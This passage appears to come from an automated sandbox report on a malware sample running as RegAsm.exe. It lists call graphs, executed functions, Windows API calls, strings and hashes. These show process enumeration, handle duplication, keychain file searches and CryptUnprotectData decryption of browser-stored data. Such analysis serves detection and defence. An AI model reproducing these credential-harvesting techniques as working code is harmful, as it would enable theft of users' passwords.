37759->37783 37784 4226e0 12 API calls 37759->37784 37761 42014c 37760->37761 37764 420151 37760->37764 37803 41e466 96 API calls 37761->37803 37763 420162 37763->37741 37764->37763 37765 4201b3 37764->37765 37766 420229 37764->37766 37767 4201b8 37765->37767 37768 4201dc 37765->37768 37766->37763 37769 41fd5e 85 API calls 37766->37769 37794 41fbdb 37767->37794 37768->37763 37773 4201ff 37768->37773 37800 41fc4c 37768->37800 37769->37763 37773->37763 37775 42013a 96 API calls 37773->37775 37775->37763 37776->37741 37777->37741 37778->37741 37779->37741 37780->37735 37781->37741 37782->37741 37783->37759 37784->37759 37785->37735 37786->37731 37787->37738 37788->37741 37789->37749 37790->37746 37791->37746 37792->37725 37793->37735 37795 41fbf8 37794->37795 37798 41fbf1 37794->37798 37808 41ee26 37795->37808 37799 41fc39 37798->37799 37818 4446ce 11 API calls 37798->37818 37799->37763 37804 41fd5e 37799->37804 37801 41ee6b 85 API calls 37800->37801 37802 41fc5d 37801->37802 37802->37768 37803->37764 37807 41fd65 37804->37807 37805 41fdab 37805->37763 37806 41fbdb 85 API calls 37806->37807 37807->37805 37807->37806 37809 41ee41 37808->37809 37810 41ee32 37808->37810 37819 41edad 37809->37819 37822 4446ce 11 API calls 37810->37822 37813 41ee3c 37813->37798 37816 41ee58 37816->37813 37824 41ee6b 37816->37824 37818->37799 37828 41be52 37819->37828 37822->37813 37823 41eb85 11 API calls 37823->37816 37825 41ee70 37824->37825 37826 41ee78 37824->37826 37884 41bf99 85 API calls 37825->37884 37826->37813 37829 41be6f 37828->37829 37830 41be5f 37828->37830 37835 41be8c 37829->37835 37849 418c63 37829->37849 37863 4446ce 11 API calls 37830->37863 37832 41be69 37832->37813 37832->37823 37835->37832 37836 41bf3a 37835->37836 37837 41bed1 37835->37837 37840 41bee7 37835->37840 37866 4446ce 11 API calls 37836->37866 37839 41bef0 37837->37839 37842 41bee2 37837->37842 37839->37840 37841 41bf01 37839->37841 37840->37832 37867 41a453 85 API calls 37840->37867 37843 41bf24 memset 37841->37843 37845 41bf14 37841->37845 37864 418a6d memset memcpy memset 37841->37864 37853 41ac13 37842->37853 37843->37832 37865 41a223 memset memcpy memset 37845->37865 37848 41bf20 37848->37843 37850 418c72 37849->37850 37851 418c94 37850->37851 37852 418d51 memset memset 37850->37852 37851->37835 37852->37851 37854 41ac52 37853->37854 37855 41ac3f memset 37853->37855 37858 41ac6a 37854->37858 37868 41dc14 19 API calls 37854->37868 37856 41acd9 37855->37856 37856->37840 37860 41aca1 37858->37860 37869 41519d 37858->37869 37860->37856 37861 41acc0 memset 37860->37861 37862 41accd memcpy 37860->37862 37861->37856 37862->37856 37863->37832 37864->37845 37865->37848 37866->37840 37868->37858 37872 4175ed 37869->37872 37880 417570 SetFilePointer 37872->37880 37875 41760a ReadFile 37876 417637 37875->37876 37877 417627 GetLastError 37875->37877 37878 4151b3 37876->37878 37879 41763e memset 37876->37879 37877->37878 37878->37860 37879->37878 37881 4175b2 37880->37881 37882 41759c GetLastError 37880->37882 37881->37875 37881->37878 37882->37881 37883 4175a8 GetLastError 37882->37883 37883->37881 37884->37826 37885 417bc5 37887 417c61 37885->37887 37890 417bda 37885->37890 37886 417bf6 UnmapViewOfFile CloseHandle 37886->37886 37886->37890 37889 417c2c 37889->37890 37897 41851e 18 API calls 37889->37897 37890->37886 37890->37887 37890->37889 37892 4175b7 37890->37892 37893 4175d6 CloseHandle 37892->37893 37894 4175c8 37893->37894 37895 4175df 37893->37895 37894->37895 37896 4175ce Sleep 37894->37896 37895->37890 37896->37893 37897->37889 39945 4147f3 39948 414561 39945->39948 39947 414813 39949 41456d 39948->39949 39950 41457f GetPrivateProfileIntW 39948->39950 39953 4143f1 memset _itow WritePrivateProfileStringW 39949->39953 39950->39947 39952 41457a 39952->39947 39953->39952

                                                                        Executed Functions

                                                                        Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040DDAD
                                                                          • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                        • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                          • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                        • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                        • CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                                                                        • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                        • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                        • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                        • _wcsicmp.MSVCRT ref: 0040DED8
                                                                        • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                        • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                        • DuplicateHandle.KERNEL32(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                        • memset.MSVCRT ref: 0040DF5F
                                                                        • CloseHandle.KERNEL32(C0000004), ref: 0040DF92
                                                                        • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                        • CloseHandle.KERNEL32(00000104), ref: 0040DFF2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                        • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                        • API String ID: 2018390131-3398334509
                                                                        • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                        • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                        • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                        • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                        Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                          • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                          • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                                          • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                        • GetDiskFreeSpaceW.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                        • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                                                                        • String ID:
                                                                        • API String ID: 2947809556-0
                                                                        • Opcode ID: 1567c4eabff52167ca9608279aac156b488c53421658029fcd1b3afb43c795bc
                                                                        • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                        • Opcode Fuzzy Hash: 1567c4eabff52167ca9608279aac156b488c53421658029fcd1b3afb43c795bc
                                                                        • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                        Function 00404423 Relevance: 3.1, APIs: 2, Instructions: 51encryptionCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                        • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Library$Load$CryptDataDirectoryFreeSystemUnprotectmemsetwcscatwcscpy
                                                                        • String ID:
                                                                        • API String ID: 1945712969-0
                                                                        • Opcode ID: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                                        • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                        • Opcode Fuzzy Hash: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                                        • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                        Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                        • FindNextFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: FileFind$FirstNext
                                                                        • String ID:
                                                                        • API String ID: 1690352074-0
                                                                        • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                        • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                        • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                        • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                        Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • memset.MSVCRT ref: 0041898C
                                                                        • GetSystemInfo.KERNEL32(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: InfoSystemmemset
                                                                        • String ID:
                                                                        • API String ID: 3558857096-0
                                                                        • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                        • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                        • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                        • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                        Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 42 44558e-445594 call 444b06 4->42 43 44557e-445580 call 4136c0 4->43 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 45 445823-445826 14->45 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 52 445879-44587c 18->52 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 87 445685 21->87 88 4456b2-4456b5 call 40b1ab 21->88 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 138 44592d-445945 call 40b6ef 24->138 139 44594a 24->139 37 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->37 38 445b29-445b32 28->38 157 4459d0-4459e8 call 40b6ef 29->157 158 4459ed 29->158 30->21 41 445609-44560d 30->41 31->30 182 445b08-445b15 call 40ae51 37->182 53 445c7c-445c85 38->53 54 445b38-445b96 memset * 3 38->54 41->21 50 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->50 42->3 66 445585-44558c call 41366b 43->66 55 44584c-445854 call 40b1ab 45->55 56 445828 45->56 154 445665-445670 call 40b1ab 50->154 155 445643-445663 call 40a9b5 call 4087b3 50->155 67 4458a2-4458aa call 40b1ab 52->67 68 44587e 52->68 63 445d1c-445d25 53->63 64 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->64 69 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->69 70 445b98-445ba0 54->70 55->13 71 44582e-445847 call 40a9b5 call 4087b3 56->71 76 445fae-445fb2 63->76 77 445d2b-445d3b 63->77 159 445cf5 64->159 160 445cfc-445d03 64->160 66->42 67->19 85 445884-44589d call 40a9b5 call 4087b3 68->85 249 445c77 69->249 70->69 86 445ba2-445bcf call 4099c6 call 445403 call 445389 70->86 141 445849 71->141 93 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 77->93 94 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 77->94 146 44589f 85->146 86->53 103 44568b-4456a4 call 40a9b5 call 4087b3 87->103 106 4456ba-4456c4 88->106 165 445d67-445d6c 93->165 166 445d71-445d83 call 445093 93->166 196 445e17 94->196 197 445e1e-445e25 94->197 148 4456a9-4456b0 103->148 120 4457f9 106->120 121 4456ca-4456d3 call 413cfa call 413d4c 106->121 120->6 174 4456d8-4456f7 call 40b2cc call 413fa6 121->174 138->139 139->23 141->55 146->67 148->88 148->103 154->106 155->154 157->158 158->28 159->160 171 445d05-445d13 160->171 172 445d17 160->172 176 445fa1-445fa9 call 40b6ef 165->176 166->76 171->172 172->63 206 4456fd-445796 memset * 4 call 409c70 * 3 174->206 207 4457ea-4457f7 call 413d29 174->207 176->76 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->38 201->182 220 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->220 239 445e62-445e69 202->239 240 445e5b 202->240 219 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->219 206->207 248 445798-4457ca call 40b2cc call 409d1f call 409b98 206->248 207->10 219->76 253 445f9b 219->253 220->182 239->203 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 264 445f4d-445f5a call 40ae51 245->264 248->207 265 4457cc-4457e5 call 4087b3 248->265 249->53 253->176 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->219 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                        APIs
                                                                        • memset.MSVCRT ref: 004455C2
                                                                        • wcsrchr.MSVCRT ref: 004455DA
                                                                        • memset.MSVCRT ref: 0044570D
                                                                        • memset.MSVCRT ref: 00445725
                                                                          • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                          • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                          • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                          • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                                                          • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                          • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                                                        • memset.MSVCRT ref: 0044573D
                                                                        • memset.MSVCRT ref: 00445755
                                                                        • memset.MSVCRT ref: 004458CB
                                                                        • memset.MSVCRT ref: 004458E3
                                                                        • memset.MSVCRT ref: 0044596E
                                                                        • memset.MSVCRT ref: 00445A10
                                                                        • memset.MSVCRT ref: 00445A28
                                                                        • memset.MSVCRT ref: 00445AC6
                                                                          • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                          • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                          • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                          • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                          • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                          • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                        • memset.MSVCRT ref: 00445B52
                                                                        • memset.MSVCRT ref: 00445B6A
                                                                        • memset.MSVCRT ref: 00445C9B
                                                                        • memset.MSVCRT ref: 00445CB3
                                                                        • _wcsicmp.MSVCRT ref: 00445D56
                                                                        • memset.MSVCRT ref: 00445B82
                                                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                          • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                          • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                          • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                          • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                        • memset.MSVCRT ref: 00445986
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AttributesCloseCreateFolderHandlePathSizeSpecial_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                                                        • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                        • API String ID: 381723030-3798722523
                                                                        • Opcode ID: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                        • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                        • Opcode Fuzzy Hash: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                        • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                        Function 0041276D Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                          • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                          • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                        • SetErrorMode.KERNEL32(00008001), ref: 00412799
                                                                        • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                        • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Library$EnumErrorFreeHandleLoadMessageModeModuleResourceTypes
                                                                        • String ID: $/deleteregkey$/savelangfile
                                                                        • API String ID: 1442760552-28296030
                                                                        • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                        • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                        • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                        • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                        Function 0040B6EF Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 388fileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040B71C
                                                                          • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                          • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                        • wcsrchr.MSVCRT ref: 0040B738
                                                                        • memset.MSVCRT ref: 0040B756
                                                                        • memset.MSVCRT ref: 0040B7F5
                                                                        • CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040B838
                                                                        • memset.MSVCRT ref: 0040B851
                                                                        • memset.MSVCRT ref: 0040B8CA
                                                                        • memcmp.MSVCRT ref: 0040B9BF
                                                                          • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                          • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                        • memset.MSVCRT ref: 0040BB53
                                                                        • memcpy.MSVCRT ref: 0040BB66
                                                                        • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memset$Freewcsrchr$CloseCreateCryptDataFileHandleLibraryLocalUnprotectmemcmpmemcpywcscpy
                                                                        • String ID: chp$v10
                                                                        • API String ID: 229402216-2783969131
                                                                        • Opcode ID: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                        • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                        • Opcode Fuzzy Hash: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                        • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                        Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 505 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 508 413f00-413f11 Process32NextW 505->508 509 413da5-413ded OpenProcess 508->509 510 413f17-413f24 CloseHandle 508->510 511 413eb0-413eb5 509->511 512 413df3-413e26 memset call 413f27 509->512 511->508 513 413eb7-413ebd 511->513 519 413e79-413eae call 413959 call 413ca4 CloseHandle 512->519 520 413e28-413e35 512->520 516 413ec8-413eda call 4099f4 513->516 517 413ebf-413ec6 ??3@YAXPAX@Z 513->517 518 413edb-413ee2 516->518 517->518 525 413ee4 518->525 526 413ee7-413efe 518->526 519->511 522 413e61-413e68 520->522 523 413e37-413e44 GetModuleHandleW 520->523 522->519 529 413e6a-413e77 QueryFullProcessImageNameW 522->529 523->522 528 413e46-413e5c 523->528 525->526 526->508 528->522 529->519
                                                                        APIs
                                                                          • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                                        • memset.MSVCRT ref: 00413D7F
                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                        • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                        • memset.MSVCRT ref: 00413E07
                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                        • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104,00000000,?), ref: 00413E77
                                                                        • CloseHandle.KERNEL32(?), ref: 00413EA8
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00413F1A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
